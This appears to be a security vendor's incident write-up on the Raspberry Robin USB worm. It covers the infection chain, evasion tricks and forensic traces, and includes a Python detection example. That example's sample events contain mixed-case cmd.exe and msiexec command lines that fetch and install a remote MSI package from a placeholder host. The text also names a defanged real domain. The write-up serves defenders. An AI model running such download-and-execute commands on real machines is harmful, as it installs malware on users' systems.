Raspberry Robin is a recent Windows worm that is known to spread through USB drives. It is also known as the QNAP worm, as it uses compromised QNAP devices in its C2 infrastructure.
The initial access comes from a malicious LNK file (a Windows shortcut file) present on a USB drive. It launches cmd.exe to read a second file, with a random name, present in the same location; that file executes msiexec.exe to download and execute a remote MSI package.
A malicious DLL file is then installed on the system via this MSI package, and a Registry Run key is used to achieve persistence.
This worm also abuses multiple legitimate Windows binaries (aka LOLBins), such as msiexec.exe, fodhelper.exe or odbcconf.exe, to evade defenses.
In a real situation, we have seen a user execute the malicious LNK file related to the Raspberry Robin attack, with mixed case used on the command lines to try to evade detection by security products such as antivirus or EDR (Endpoint Detection and Response):
1. The user executes the malicious LNK file from a USB drive, which executes the content of the ZxYLR.lng file. An alert is generated because this execution (cmd.exe launched by explorer.exe) is typically the result of clicking a malicious link, which is itself often the result of a spearphishing attack. Moreover, in this case the current directory is not the system drive but a drive from a mounted device. An execution from this type of drive can also be the result of a spearphishing attack via a disk image file (such as ISO or IMG) containing a malicious link.
2. The ZxYLR.lng file contains the msiexec.exe command used to download and execute a remote MSI package. Note that the URL contains the machine name (i.e. MACHINE) and the username (i.e. USERNAME). An alert is generated because this execution of msiexec.exe is relatively suspicious.
In this case, at the time of the attack, the domain 2yD[.]eu no longer resolved, so we were not able to observe the next step of the attack.
We can also note the use of mixed case on the command lines to try to evade detection by security products such as antivirus or EDR.
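To make the two alerts above and the mixed-case note concrete, here is an added detection example (not HarfangLab's code or detection rules) that runs the three checks over constructed process-creation events: cmd.exe spawned by explorer.exe from a non-system drive, msiexec.exe given an HTTP(S) package whose URL embeds the host and user names, and a mixed-case binary name. The ProcessEvent fields, rule names, drive letter and the example.invalid domain are assumptions.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:  # minimal process-creation record; constructed field set, not a specific EDR schema
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str
    current_directory: str

SYSTEM_DRIVE = "C:"
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]

def is_mixed_case(token: str) -> bool:
    name = token.rsplit(".", 1)[0]  # 'mSiExEc' is neither lower, upper nor Capitalised
    return name not in (name.lower(), name.upper(), name.capitalize())

def analyze(ev: ProcessEvent) -> list[str]:
    findings = []
    image, parent = basename(ev.image).lower(), basename(ev.parent_image).lower()
    first_token = basename(ev.command_line.split()[0].strip('"')) if ev.command_line.split() else ""
    # 1. cmd.exe spawned by explorer.exe while the working directory is not on the system drive
    if image == "cmd.exe" and parent == "explorer.exe" \
            and not ev.current_directory.upper().startswith(SYSTEM_DRIVE):
        findings.append("cmd_from_explorer_on_removable_drive")
    # 2. msiexec.exe given a package over HTTP(S); case-insensitive matching defeats the mixed-case trick
    url = URL_RE.search(ev.command_line) if image == "msiexec.exe" else None
    if url:
        findings.append("msiexec_remote_package")
        if ev.host.lower() in url.group(0).lower() and ev.user.lower() in url.group(0).lower():
            findings.append("msiexec_url_leaks_host_and_user")  # URL embeds host and user names, as above
    # 3. mixed-case spelling of the binary name on the command line
    if is_mixed_case(first_token):
        findings.append("mixed_case_command_line")
    return findings

# Constructed sample telemetry: domain, port and drive letter are placeholders, not the page's indicators.
EXPLORER, CMD = r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe"
MSIEXEC, SERVICES = r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\services.exe"
SAMPLE_EVENTS = [
    ProcessEvent("MACHINE", "USERNAME", EXPLORER, CMD, "CmD.eXe /R <ZxYLR.lng", "E:\\"),
    ProcessEvent("MACHINE", "USERNAME", CMD, MSIEXEC, "mSiExEc /Q /i http://example.invalid:8080/MACHINE=USERNAME", "E:\\"),
    ProcessEvent("MACHINE", "USERNAME", EXPLORER, CMD, "cmd.exe", r"C:\Users\USERNAME"),
    ProcessEvent("MACHINE", "USERNAME", SERVICES, MSIEXEC, "msiexec.exe /V", r"C:\Windows\System32"),
]
```

Running analyze() over SAMPLE_EVENTS flags only the first two events; the last two (a cmd.exe opened from the user profile and a local msiexec.exe invocation) produce no findings.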
The UserAssist registry data, retrieved from the user's NTUSER.DAT hive, is an artifact that lists the programs recently run by a user on a Windows system. In our case, this artifact gives us the name of the LNK file launched by the user:
Besides the mount of the USB drive, the Application channel of the Windows Event Logs allows us to highlight the execution of a suspicious remote MSI package related to the Raspberry Robin worm:
In our case we did not have the chance to observe a complete compromise, as the domain used to download the malicious MSI package was no longer resolving.
However, we can see that the initial access phase is relatively easy to detect and can be blocked automatically. We can also note that this initial access phase is similar to the current attacks based on ISO images, used as an alternative to malicious macros, containing a LNK file that abuses LOLBins, much like the QakBot malware.
HarfangLab is a cybersecurity software company, created in 2018 by former members of the Ministry of Defense, major cybersecurity companies and the National Cybersecurity Agency of France (ANSSI), who have more than 25 years of experience in cyber defense.
HarfangLab was created to protect organizations' IT systems while preserving their digital integrity. To reach that goal, the company has developed a sovereign EDR (Endpoint Detection & Response) designed to protect the computers and servers of an IT system. Today, HarfangLab is the only EDR certified by the National Cybersecurity Agency of France (ANSSI).